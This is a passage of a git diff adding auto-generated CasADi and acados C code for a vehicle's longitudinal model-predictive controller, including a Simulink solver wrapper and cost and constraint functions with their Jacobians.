// y_ref - for stages 1 to N-1 + in_sign = ssGetInputPortRealSignalPtrs(S, 4); + + for (int ii = 1; ii < 12; ii++) + { + for (int jj = 0; jj < 6; jj++) + buffer[jj] = (double)(*in_sign[(ii-1)*6+jj]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, ii, "yref", (void *) buffer); + } + + + // y_ref_e + in_sign = ssGetInputPortRealSignalPtrs(S, 5); + + for (int i = 0; i < 5; i++) + buffer[i] = (double)(*in_sign[i]); + + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 12, "yref", (void *) buffer); + // lh + in_sign = ssGetInputPortRealSignalPtrs(S, 6); + + for (int i = 0; i < 4; i++) + buffer[i] = (double)(*in_sign[i]); + + for (int ii = 0; ii < 12; ii++) + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, ii, "lh", buffer); + // uh + in_sign = ssGetInputPortRealSignalPtrs(S, 7); + + for (int i = 0; i < 4; i++) + buffer[i] = (double)(*in_sign[i]); + + for (int ii = 0; ii < 12; ii++) + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, ii, "uh", buffer); + + /* call solver */ + int rti_phase = 0; + ocp_nlp_solver_opts_set(nlp_config, capsule->nlp_opts, "rti_phase", &rti_phase); + int acados_status = long_acados_solve(capsule); + + + /* set outputs */ + // assign pointers to output signals + real_t *out_u0, *out_utraj, *out_xtraj, *out_status, *out_sqp_iter, *out_KKT_res, *out_x1, *out_cpu_time, *out_cpu_time_sim, *out_cpu_time_qp, *out_cpu_time_lin; + int tmp_int; + out_u0 = ssGetOutputPortRealSignal(S, 0); + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, 0, "u", (void *) out_u0); + + + out_status = ssGetOutputPortRealSignal(S, 1); + *out_status = (real_t) acados_status; + out_KKT_res = ssGetOutputPortRealSignal(S, 2); + *out_KKT_res = (real_t) nlp_out->inf_norm_res; + out_x1 = ssGetOutputPortRealSignal(S, 3); + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, 1, "x", (void *) out_x1); + out_cpu_time = ssGetOutputPortRealSignal(S, 4); + // get solution time + ocp_nlp_get(nlp_config, capsule->nlp_solver, "time_tot", (void *) out_cpu_time); + out_sqp_iter = ssGetOutputPortRealSignal(S, 5); + // get sqp iter + ocp_nlp_get(nlp_config, capsule->nlp_solver, "sqp_iter", (void *) &tmp_int); + *out_sqp_iter = (real_t) tmp_int; + +} + +static void mdlTerminate(SimStruct *S) +{ + long_solver_capsule *capsule = ssGetUserData(S); + + long_acados_free(capsule); + long_acados_free_capsule(capsule); +} + + +#ifdef MATLAB_MEX_FILE +#include "simulink.c" +#else +#include "cg_sfun.h" +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/libacados_ocp_solver_long.so b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/libacados_ocp_solver_long.so index 3d712e9de..da3a2c889 100755 Binary files a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/libacados_ocp_solver_long.so and b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/libacados_ocp_solver_long.so differ diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_constraints/long_constr_h_fun.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_constraints/long_constr_h_fun.c new file mode 100644 index 000000000..3b4ac762c --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_constraints/long_constr_h_fun.c @@ -0,0 +1,179 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_constr_h_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[3] = {0, 0, 0}; +static const casadi_int casadi_s3[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s4[8] = {4, 1, 0, 4, 0, 1, 2, 3}; + +/* long_constr_h_fun:(i0[3],i1,i2[],i3[6])->(o0[4]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a1=arg[0]? arg[0][2] : 0; + a2=arg[3]? arg[3][0] : 0; + a2=(a1-a2); + if (res[0]!=0) res[0][1]=a2; + a2=arg[3]? arg[3][1] : 0; + a2=(a2-a1); + if (res[0]!=0) res[0][2]=a2; + a2=arg[3]? arg[3][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a2=(a2-a1); + a1=arg[3]? arg[3][5] : 0; + a3=casadi_sq(a0); + a4=5.; + a3=(a3/a4); + a4=arg[3]? arg[3][4] : 0; + a4=(a4*a0); + a3=(a3+a4); + a4=6.; + a3=(a3+a4); + a1=(a1*a3); + a2=(a2-a1); + a1=10.; + a0=(a0+a1); + a2=(a2/a0); + if (res[0]!=0) res[0][3]=a2; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_constr_h_fun_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int long_constr_h_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_constr_h_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_constr_h_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_constr_h_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_constr_h_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_constr_h_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s4; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_constraints/long_constr_h_fun_jac_uxt_zt.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_constraints/long_constr_h_fun_jac_uxt_zt.c new file mode 100644 index 000000000..27832aa56 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_constraints/long_constr_h_fun_jac_uxt_zt.c @@ -0,0 +1,205 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_constr_h_fun_jac_uxt_zt_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_s4 CASADI_PREFIX(s4) +#define casadi_s5 CASADI_PREFIX(s5) +#define casadi_s6 CASADI_PREFIX(s6) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[3] = {0, 0, 0}; +static const casadi_int casadi_s3[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s4[8] = {4, 1, 0, 4, 0, 1, 2, 3}; +static const casadi_int casadi_s5[12] = {4, 4, 0, 1, 2, 3, 5, 2, 3, 3, 1, 2}; +static const casadi_int casadi_s6[3] = {4, 0, 0}; + +/* long_constr_h_fun_jac_uxt_zt:(i0[3],i1,i2[],i3[6])->(o0[4],o1[4x4,5nz],o2[4x0]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4, a5; + a0=arg[0]? arg[0][1] : 0; + if (res[0]!=0) res[0][0]=a0; + a1=arg[0]? arg[0][2] : 0; + a2=arg[3]? arg[3][0] : 0; + a2=(a1-a2); + if (res[0]!=0) res[0][1]=a2; + a2=arg[3]? arg[3][1] : 0; + a2=(a2-a1); + if (res[0]!=0) res[0][2]=a2; + a2=arg[3]? arg[3][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a2=(a2-a1); + a1=arg[3]? arg[3][5] : 0; + a3=casadi_sq(a0); + a4=5.; + a3=(a3/a4); + a4=arg[3]? arg[3][4] : 0; + a5=(a4*a0); + a3=(a3+a5); + a5=6.; + a3=(a3+a5); + a3=(a1*a3); + a2=(a2-a3); + a3=10.; + a3=(a0+a3); + a2=(a2/a3); + if (res[0]!=0) res[0][3]=a2; + a5=1.; + if (res[1]!=0) res[1][0]=a5; + if (res[1]!=0) res[1][1]=a5; + a5=-1.; + if (res[1]!=0) res[1][2]=a5; + a5=(1./a3); + a5=(-a5); + if (res[1]!=0) res[1][3]=a5; + a5=2.0000000000000001e-01; + a0=(a0+a0); + a5=(a5*a0); + a5=(a5+a4); + a1=(a1*a5); + a1=(a1/a3); + a2=(a2/a3); + a1=(a1+a2); + a1=(-a1); + if (res[1]!=0) res[1][4]=a1; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_jac_uxt_zt(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_jac_uxt_zt_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_jac_uxt_zt_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_jac_uxt_zt_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_jac_uxt_zt_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_jac_uxt_zt_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_jac_uxt_zt_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_constr_h_fun_jac_uxt_zt_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_constr_h_fun_jac_uxt_zt_n_in(void) { return 4;} + +CASADI_SYMBOL_EXPORT casadi_int long_constr_h_fun_jac_uxt_zt_n_out(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_real long_constr_h_fun_jac_uxt_zt_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_constr_h_fun_jac_uxt_zt_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + case 3: return "i3"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_constr_h_fun_jac_uxt_zt_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + case 2: return "o2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_constr_h_fun_jac_uxt_zt_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + case 3: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_constr_h_fun_jac_uxt_zt_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s4; + case 1: return casadi_s5; + case 2: return casadi_s6; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_constr_h_fun_jac_uxt_zt_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 4; + if (sz_res) *sz_res = 3; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_fun.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_fun.c new file mode 100644 index 000000000..09f838e55 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_fun.c @@ -0,0 +1,172 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_0_fun_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; + +/* long_cost_y_0_fun:(i0[3],i1,i2[6])->(o0[6]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4; + a0=arg[2]? arg[2][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a0=(a0-a1); + a2=arg[0]? arg[0][1] : 0; + a3=casadi_sq(a2); + a4=5.; + a3=(a3/a4); + a4=arg[2]? arg[2][4] : 0; + a4=(a4*a2); + a3=(a3+a4); + a4=6.; + a3=(a3+a4); + a0=(a0-a3); + a3=10.; + a3=(a2+a3); + a0=(a0/a3); + if (res[0]!=0) res[0][0]=a0; + if (res[0]!=0) res[0][1]=a1; + if (res[0]!=0) res[0][2]=a2; + a2=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][3]=a2; + a1=arg[2]? arg[2][3] : 0; + a2=(a2-a1); + if (res[0]!=0) res[0][4]=a2; + a2=arg[1]? arg[1][0] : 0; + if (res[0]!=0) res[0][5]=a2; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_0_fun_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_0_fun_n_out(void) { return 1;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_0_fun_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_0_fun_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_0_fun_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_0_fun_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_0_fun_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 1; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_fun_jac_ut_xt.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_fun_jac_ut_xt.c new file mode 100644 index 000000000..1347703e5 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_fun_jac_ut_xt.c @@ -0,0 +1,194 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_0_fun_jac_ut_xt_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ +#ifndef CASADI_SYMBOL_EXPORT + #if defined(_WIN32) || defined(__WIN32__) || defined(__CYGWIN__) + #if defined(STATIC_LINKED) + #define CASADI_SYMBOL_EXPORT + #else + #define CASADI_SYMBOL_EXPORT __declspec(dllexport) + #endif + #elif defined(__GNUC__) && defined(GCC_HASCLASSVISIBILITY) + #define CASADI_SYMBOL_EXPORT __attribute__ ((visibility ("default"))) + #else + #define CASADI_SYMBOL_EXPORT + #endif +#endif + +casadi_real casadi_sq(casadi_real x) { return x*x;} + +static const casadi_int casadi_s0[7] = {3, 1, 0, 3, 0, 1, 2}; +static const casadi_int casadi_s1[5] = {1, 1, 0, 1, 0}; +static const casadi_int casadi_s2[10] = {6, 1, 0, 6, 0, 1, 2, 3, 4, 5}; +static const casadi_int casadi_s3[16] = {4, 6, 0, 2, 3, 4, 5, 6, 7, 1, 2, 1, 2, 3, 3, 0}; + +/* long_cost_y_0_fun_jac_ut_xt:(i0[3],i1,i2[6])->(o0[6],o1[4x6,7nz]) */ +static int casadi_f0(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem) { + casadi_real a0, a1, a2, a3, a4, a5; + a0=arg[2]? arg[2][2] : 0; + a1=arg[0]? arg[0][0] : 0; + a0=(a0-a1); + a2=arg[0]? arg[0][1] : 0; + a3=casadi_sq(a2); + a4=5.; + a3=(a3/a4); + a4=arg[2]? arg[2][4] : 0; + a5=(a4*a2); + a3=(a3+a5); + a5=6.; + a3=(a3+a5); + a0=(a0-a3); + a3=10.; + a3=(a2+a3); + a0=(a0/a3); + if (res[0]!=0) res[0][0]=a0; + if (res[0]!=0) res[0][1]=a1; + if (res[0]!=0) res[0][2]=a2; + a1=arg[0]? arg[0][2] : 0; + if (res[0]!=0) res[0][3]=a1; + a5=arg[2]? arg[2][3] : 0; + a1=(a1-a5); + if (res[0]!=0) res[0][4]=a1; + a1=arg[1]? arg[1][0] : 0; + if (res[0]!=0) res[0][5]=a1; + a1=(1./a3); + a1=(-a1); + if (res[1]!=0) res[1][0]=a1; + a1=2.0000000000000001e-01; + a2=(a2+a2); + a1=(a1*a2); + a1=(a1+a4); + a1=(a1/a3); + a0=(a0/a3); + a1=(a1+a0); + a1=(-a1); + if (res[1]!=0) res[1][1]=a1; + a1=1.; + if (res[1]!=0) res[1][2]=a1; + if (res[1]!=0) res[1][3]=a1; + if (res[1]!=0) res[1][4]=a1; + if (res[1]!=0) res[1][5]=a1; + if (res[1]!=0) res[1][6]=a1; + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_jac_ut_xt(const casadi_real** arg, casadi_real** res, casadi_int* iw, casadi_real* w, int mem){ + return casadi_f0(arg, res, iw, w, mem); +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_jac_ut_xt_alloc_mem(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_jac_ut_xt_init_mem(int mem) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_jac_ut_xt_free_mem(int mem) { +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_jac_ut_xt_checkout(void) { + return 0; +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_jac_ut_xt_release(int mem) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_jac_ut_xt_incref(void) { +} + +CASADI_SYMBOL_EXPORT void long_cost_y_0_fun_jac_ut_xt_decref(void) { +} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_0_fun_jac_ut_xt_n_in(void) { return 3;} + +CASADI_SYMBOL_EXPORT casadi_int long_cost_y_0_fun_jac_ut_xt_n_out(void) { return 2;} + +CASADI_SYMBOL_EXPORT casadi_real long_cost_y_0_fun_jac_ut_xt_default_in(casadi_int i) { + switch (i) { + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_0_fun_jac_ut_xt_name_in(casadi_int i) { + switch (i) { + case 0: return "i0"; + case 1: return "i1"; + case 2: return "i2"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const char* long_cost_y_0_fun_jac_ut_xt_name_out(casadi_int i) { + switch (i) { + case 0: return "o0"; + case 1: return "o1"; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_0_fun_jac_ut_xt_sparsity_in(casadi_int i) { + switch (i) { + case 0: return casadi_s0; + case 1: return casadi_s1; + case 2: return casadi_s2; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT const casadi_int* long_cost_y_0_fun_jac_ut_xt_sparsity_out(casadi_int i) { + switch (i) { + case 0: return casadi_s2; + case 1: return casadi_s3; + default: return 0; + } +} + +CASADI_SYMBOL_EXPORT int long_cost_y_0_fun_jac_ut_xt_work(casadi_int *sz_arg, casadi_int* sz_res, casadi_int *sz_iw, casadi_int *sz_w) { + if (sz_arg) *sz_arg = 3; + if (sz_res) *sz_res = 2; + if (sz_iw) *sz_iw = 0; + if (sz_w) *sz_w = 0; + return 0; +} + + +#ifdef __cplusplus +} /* extern "C" */ +#endif diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_hess.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_hess.c new file mode 100644 index 000000000..5a0b4a82b --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/long_cost/long_cost_y_0_hess.c @@ -0,0 +1,197 @@ +/* This file was automatically generated by CasADi 3.6.3. + * It consists of: + * 1) content generated by CasADi runtime: not copyrighted + * 2) template code copied from CasADi source: permissively licensed (MIT-0) + * 3) user code: owned by the user + * + */ +#ifdef __cplusplus +extern "C" { +#endif + +/* How to prefix internal symbols */ +#ifdef CASADI_CODEGEN_PREFIX + #define CASADI_NAMESPACE_CONCAT(NS, ID) _CASADI_NAMESPACE_CONCAT(NS, ID) + #define _CASADI_NAMESPACE_CONCAT(NS, ID) NS ## ID + #define CASADI_PREFIX(ID) CASADI_NAMESPACE_CONCAT(CODEGEN_PREFIX, ID) +#else + #define CASADI_PREFIX(ID) long_cost_y_0_hess_ ## ID +#endif + +#include + +#ifndef casadi_real +#define casadi_real double +#endif + +#ifndef casadi_int +#define casadi_int int +#endif + +/* Add prefix to internal symbols */ +#define casadi_f0 CASADI_PREFIX(f0) +#define casadi_s0 CASADI_PREFIX(s0) +#define casadi_s1 CASADI_PREFIX(s1) +#define casadi_s2 CASADI_PREFIX(s2) +#define casadi_s3 CASADI_PREFIX(s3) +#define casadi_sq CASADI_PREFIX(sq) + +/* Symbol visibility in DLLs */ 